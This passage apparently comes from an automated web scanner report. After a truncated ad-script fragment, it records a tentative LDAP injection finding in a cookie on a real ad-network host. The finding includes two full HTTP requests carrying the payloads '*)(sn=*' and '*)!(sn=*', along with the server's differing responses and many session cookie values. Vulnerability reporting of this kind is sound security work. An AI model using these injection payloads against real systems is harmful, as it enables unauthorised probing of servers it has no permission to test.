document.write('<param name="movie" value="http://c5.zedo.com//OzoDB/q/7/806020/V1/300x250_7060dg_krons_debtw_vtg.swf?clickTAG=http://xads.zedo.com/ads2/c%3Fa=806020%3Bn=305%3Bx=2333%3Bc=305002942,305002942%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=916%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bp%3D8%3Bf%3D749621%3Bh%3D749620%3Bo%3D20%3By%3D67%3Bv%3D1%3Bt%3Di%3Bk=http://media2.legacy.com/adlink/5306/1804573/0/170/AdId=1437456;BnId=1;itime=646950193;nodecode=yes;link=http://www.howlifeworks.com/a/a/?cid=7060dg" />');
document.write('<param name="quality" value="high" />');
document.write('<param name="bgcolor" value="#ffffff" />');
document.write('<param name="wmode" value="transparent">');
document.write('<embed src="http://c5.zedo.com//OzoDB/q/7/806020/V1/300x250_7060dg_krons_debtw_vtg.swf?clickTAG=http://xads.zedo.com/ads2/c%3Fa=806020%3Bn=305%3Bx=2333%3Bc=305002942,305002942%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=916%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bp%3D8%3Bf%3D749621%3Bh%3D749620%3Bo%3D20%3By%3D67%3Bv%3D1%3Bt%3Di%3Bk=http://media2.legacy.com/adlink/5306/1804573/0/170/AdId=1437456;BnId=1;itime=646950193;nodecode=yes;link=http://www.howlifeworks.com/a/a/?cid=7060dg" quality="high" bgcolor="#ffffff" width="300" height="250" name="300x250_7060dg_krons_debtw_vtg" align="middle" allowScriptAccess="sameDomain" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer" />');
document.write('</object>');

var zzChId = -1;
var zzPbId = -1;
zzChId='2942';zzPbId='916';
var zzAdTagId = '806020_'+zzChId+'_'+zzPb
...[SNIP]...

2.2. http://tap.rubiconproject.com/oz/sensor [put_2100 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The put_2100 cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the put_2100 cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /oz/sensor?p=rubicon&pc=6005/12414&cd=false&xt=3&k=&rd=drudgereport.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://intermrkts.vo.llnwd.net/o35/u/ExtraCode/DrudgeReport/intermarkets.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_2081=CA-00000000456885722; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=*)(sn=*; put_1197=3297869551067506954; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_1994=6ch47d7o8wtv; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; xdp_ti="7 Feb 2011 22:48:47 GMT"; lm="7 Feb 2011 22:48:47 GMT"; csi15=667425.js^1^1297190267^1297190267&329267.js^1^1297190250^1297190250&3178297.js^1^1297190221^1297190221&3178300.js^1^1297186286^1297186286&3187866.js^2^1297186264^1297186285&3173809.js^1^1297186265^1297186265&3187311.js^2^1297186228^1297186247&3144082.js^1^1297186229^1297186229&3174520.js^1^1297185849^1297185849; csi2=3185375.js^3^1297190198^1297195331&3187864.js^6^1297186263^1297195302&329265.js^1^1297195268^1297195268&3140640.js^1^1297195255^1297195255&2415222.js^2^1297186265^1297186287&3162307.js^2^1297186245^1297186249&3187064.js^1^1297186232^1297186232&3138805.js^3^1297185842^1297186231&3144080.js^1^1297186227^1297186227&667421.js^1^1297186143^1297186143&3174518.js^1^1297185827^1297185827; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; cd=false; dq=42|5|37|0; ruid=154d290e46adc1d6f373dd09^15^1297646572^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; ses9=12414^1; csi9=3147455.js^1^1297646572^1297646572; rpb=2399%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%266286%3D1%266073%3D1%264214%3D1%262119%3D1%265722%3D1%264939%3D1%264940%3D1%264222%3D1%266457%3D1%266276%3D1%264212%3D1%266356%3D1%262372%3D1%264944%3D1%262374%3D1%264970%3D1%264894%3D1; put_1986=4760492999213801733

Response 1

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 14:49:46 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 14-Feb-2012 14:49:46 GMT; Path=/
Set-Cookie: dq=43|5|38|0; Expires=Tue, 14-Feb-2012 14:49:46 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=6005/12414&cd=false&xt=3&k=&rd=drudgereport.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://intermrkts.vo.llnwd.net/o35/u/ExtraCode/DrudgeReport/intermarkets.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_2081=CA-00000000456885722; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2100=*)!(sn=*; put_1197=3297869551067506954; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_1994=6ch47d7o8wtv; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; xdp_ti="7 Feb 2011 22:48:47 GMT"; lm="7 Feb 2011 22:48:47 GMT"; csi15=667425.js^1^1297190267^1297190267&329267.js^1^1297190250^1297190250&3178297.js^1^1297190221^1297190221&3178300.js^1^1297186286^1297186286&3187866.js^2^1297186264^1297186285&3173809.js^1^1297186265^1297186265&3187311.js^2^1297186228^1297186247&3144082.js^1^1297186229^1297186229&3174520.js^1^1297185849^1297185849; csi2=3185375.js^3^1297190198^1297195331&3187864.js^6^1297186263^1297195302&329265.js^1^1297195268^1297195268&3140640.js^1^1297195255^1297195255&2415222.js^2^1297186265^1297186287&3162307.js^2^1297186245^1297186249&3187064.js^1^1297186232^1297186232&3138805.js^3^1297185842^1297186231&3144080.js^1^1297186227^1297186227&667421.js^1^1297186143^1297186143&3174518.js^1^1297185827^1297185827; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; cd=false; dq=42|5|37|0; ruid=154d290e46adc1d6f373dd09^15^1297646572^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6005/12414; ses9=12414^1; csi9=3147455.js^1^1297646572^1297646572; rpb=2399%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%266286%3D1%266073%3D1%264214%3D1%262119%3D1%265722%3D1%264939%3D1%264940%3D1%264222%3D1%266457%3D1%266276%3D1%264212%3D1%266356%3D1%262372%3D1%264944%3D1%262374%3D1%264970%3D1%264894%3D1; put_1986=4760492999213801733

Response 2

HTTP/1.1 204 No Content
Date: Mon, 14 Feb 2011 14:49:46 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8
